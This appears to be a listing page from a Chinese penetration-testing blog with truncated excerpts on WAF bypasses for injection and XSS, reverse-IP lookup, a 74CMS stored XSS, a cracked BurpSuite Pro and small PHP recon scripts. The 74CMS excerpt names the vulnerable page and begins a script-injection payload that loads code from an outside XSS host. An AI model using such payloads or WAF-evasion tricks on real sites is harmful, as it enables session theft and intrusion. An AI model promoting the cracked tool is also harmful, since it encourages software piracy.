尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使...
轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不...
IP反查网站,ip反查接口,旁站查询接口大全,通过IP查域名汇总:
http://bgp.he.net/ http://cn.bing.com/search?q=ip%3A220.181.111.85 http://dns.aizhan.com/?q=www.baidu.com http://domains.yougetsignal.com/domains.php...
MySQL索引类型一览 让MySQL高效运行起来
索引是快速搜索的关键。MySQL索引的建立对于MySQL的高效运行是很重要的。下面介绍几种常见的MySQL索引类型。 在数据库表中,对字段建立索引可以大大提高查询速度。假...
骑士人才(74CMS)3.X通杀XSS
个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。 漏洞页面:link/add_link.php 友情链接:LOGO处填写><script src=http://xss地...
知名渗透测试套件BurpSuite Pro v1.6 beta破解版公布
关于Burp Suite: Burp Suite 是用于渗透测试web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快渗透应用程序的过程。所有的工具都...
Hatchet 更新 2014.03.17 可过安全宝
免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任! ——————̵...
PHP实现调用必应旁站C段查询
<?php print_r( " +------------------------------------+ 旁站 and C段查询 By :Sunshie Blog:https://phpinfo.me/ Example: php.ex...
APK可视化修改工具:APK改之理(APK IDE)
米人APK改之理(原Mandarava APK改之理)是一款用于修改安卓(Android)APK程序文件的辅助工具,本工具将帮助APK修改者一键反编译、编译、签名apk文件,免去麻烦的命...
短位垃圾域名爆破机
想注册个3位的cn域名 于是就写个个这个玩意 <?php print_r( " +------------------------------------+ 垃圾域名爆破机 By :Su...